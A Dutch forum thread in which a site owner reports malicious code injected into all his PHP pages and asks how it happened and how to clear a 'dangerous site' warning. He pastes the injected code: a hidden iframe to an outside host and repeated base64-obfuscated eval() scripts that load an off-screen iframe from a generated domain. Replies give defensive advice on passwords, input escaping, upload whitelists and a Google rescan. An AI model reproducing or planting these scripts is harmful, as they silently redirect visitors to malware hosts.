Hackers?
ik heb een probleem! Blijkbaar is er, op onverklaarbare wijze, op al mijn pagina's deze code toegevoegd =>
"<iframe style="visibility: hidden; display: none; display: none;" src="http://djerseen.com/referer.php?id={A8D99C2D-8615-4C21-AB70-EE2DF83F6905}"></iframe>"
"<script>eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}returnt;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyIHVybD0iaHR0cDovLyI7DQpmb3IgKGk9MDtpPGVuYy5sZW5ndGg7aSsrKSB1cmwrPWtleXNzLnN1YnN0cigoYWgqZW5jW2ldKSAlIDMxLDEpOw0KdXJsKz0iLm9yZy90cy9nby5waHAcT0xIjsNCmZmZj0iZnJhbSI7DQppZiAoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2JvZHknKVswXSkgeyBpZnJhbWVyKCk7fSBlbHNlIHsNCmRvY3VtZW50LndyaXRlKCI8aSIrZmZmKyJlIHNyYz0nIit1cmwrIicgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnIHN0eWxlPSdwb3NpdGlvbjphYnNvbHV0ZTtsZWZ0Oi0xMDAwcHg7dG9wOi0xMDAwcHg7Jz48L2kiK2ZmZisiZT4iKTsNCn0NCmZ1bmN0aW9uIGlmcmFtZXIoKSB7DQp2YXIgZiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2knK2ZmZisnZScpOw0KZi5zZXRBdHRyaWJ1dGUoJ3NyYycsIHVybCk7DQpmLnN0eWxlLnBvc2l0aW9uID0gJ2Fic29sdXRlJzsNCmYuc3R5bGUubGVmdCA9ICctMTAwMHB4JzsNCmYuc3R5bGUudG9wID0gJy0xMDAwcHgnOw0KZi5zZXRBdHRyaWJ1dGUoJ3dpZHRoJywgJzEwMCcpOw0KZi5zZXRBdHRyaWJ1dGUoJ2hlaWdodCcsICcxMDAnKTsNCmRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdib2R5JylbMF0uYXBwZW5kQ2hpbGQoZ
ik7DQp9')));</script><script>eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}
('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyIHVybD0iaHR0cDovLyI7DQpmb3IgKGk9MDtpPGVuYy5sZW5ndGg7aSsrKSB1cmwrPWtleXNzLnN1YnN0cigoYWgqZW5jW2ldKSAlIDMxLDEpOw0KdXJsKz0iLm9yZy90cy9nby5waHAcT0xIjsNCmZmZj0iZnJhbSI7DQppZiAoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2JvZHknKVswXSkgeyBpZnJhbWVyKCk7fSBlbHNlIHsNCmRvY3VtZW50LndyaXRlKCI8aSIrZmZmKyJlIHNyYz0nIit1cmwrIicgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnIHN0eWxlPSdwb3NpdGlvbjphYnNvbHV0ZTtsZWZ0Oi0xMDAwcHg7dG9wOi0xMDAwcHg7Jz48L2kiK2ZmZisiZT4iKTsNCn0NCmZ1bmN0aW9uIGlmcmFtZXIoKSB7DQp2YXIgZiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2knK2ZmZisnZScpOw0KZi5zZXRBdHRyaWJ1dGUoJ3NyYycsIHVybCk7DQpmLnN0eWxlLnBvc2l0aW9uID0gJ2Fic29sdXRlJzsNCmYuc3R5bGUubGVmdCA9ICctMTAwMHB4JzsNCmYuc3R5bGUudG9wID0gJy0xMDAwcHgnOw0KZi5zZXRBdHRyaWJ1dGUoJ3dpZHRoJywgJzEwMCcpOw0KZi5zZXRBdHRyaWJ1dGUoJ2hlaWdodCcsICcxMDAnKTsNCmRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdib2R5JylbMF0uYXBwZW5kQ2hpbGQoZ
ik7DQp9')));</script><script>eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|
(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}
('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDM
/* Ik heb hier een heel deel weggeknipt, want dit gaat nog paginalang door ;-) Tot de laatste regel */
</script>"
Deze code blijkt dus malware te zijn, welke op onverklaarbaze wijze op mijn website gepost is..
Belangrijk is dat ik dit heb op mijn eigen website (gehost op 3owl), en dat ik deze enkel gemaakt heb dmv PHP-pagina's (dus geen CMS) & Filezilla (overzetten op server). Verder zit er voor het gastenboek een 1 MySQL database op mijn pagina. Deze code is ingesloten in mijn pagina's die zichtbaar zijn in het scherm (dus ge-include pagina's hebben deze code niet)...
Door deze code is mijn site gelocaliseerd als aanvalssite, waardoor deze onbereikbaar is. Link van mijn website is -> http://oli4tje.3owl.com/
Hoe komt het dat ik een hacker heb, wat valt hieraan te doen & hoe in de toekomst vermijden?
Vooral, als alles opgelost is (heb nu wel al alle code verwijderd), hoe zorg ik ervoor dat de melding van aanvalsite terug verwijderd word (& dus terug op een normale manier bezocht kan worden?
Alvast bedankt voor jullie raad/hulp. Want ik snap niet hoe dit kan...
Vriendelijke groeten
In ieder geval geldt nu dat je al je wachtwoorden moet veranderen en dat je heel kritisch moet gaan kijken naar alle input van buiten af: dus alle <FORM>'s. de waarden worden - waarschijnlijk met PHP- uitgelezen. Die waarden moet je controleren op alles dat maar mogelijk is en escapen zie
Heb je ook een file upload in één of meerdere formulieren? zorg dan dat er nooit geen extensies als PHP e.d. geupload kunnen worden. Je moet dit controleren niet aan de hand van een blacklist maar aan de hand van een whitelist, dus alleen extensies doorlaten die jij goedkeurt
ik denk een FTP lek, wachtwoorden veranderen en bij google developer tools een aanvraag doen voor een rescan of hoe het ook heet.. ( ben het ff kwijt ) maar het is niet te missen als je op de pagina bent. ( binnen ongeveer 2 uur meestal ) zou het probleem opgelost moeten zijn. en anders moet je wachten kan een paar uur duren of een week.. maar als google merkt dat het gevaar weg is dan wordt de melding weggehaald :)
Misschien ook je gastenboek even checken. Je kunt nu gewoon op submit drukken en voila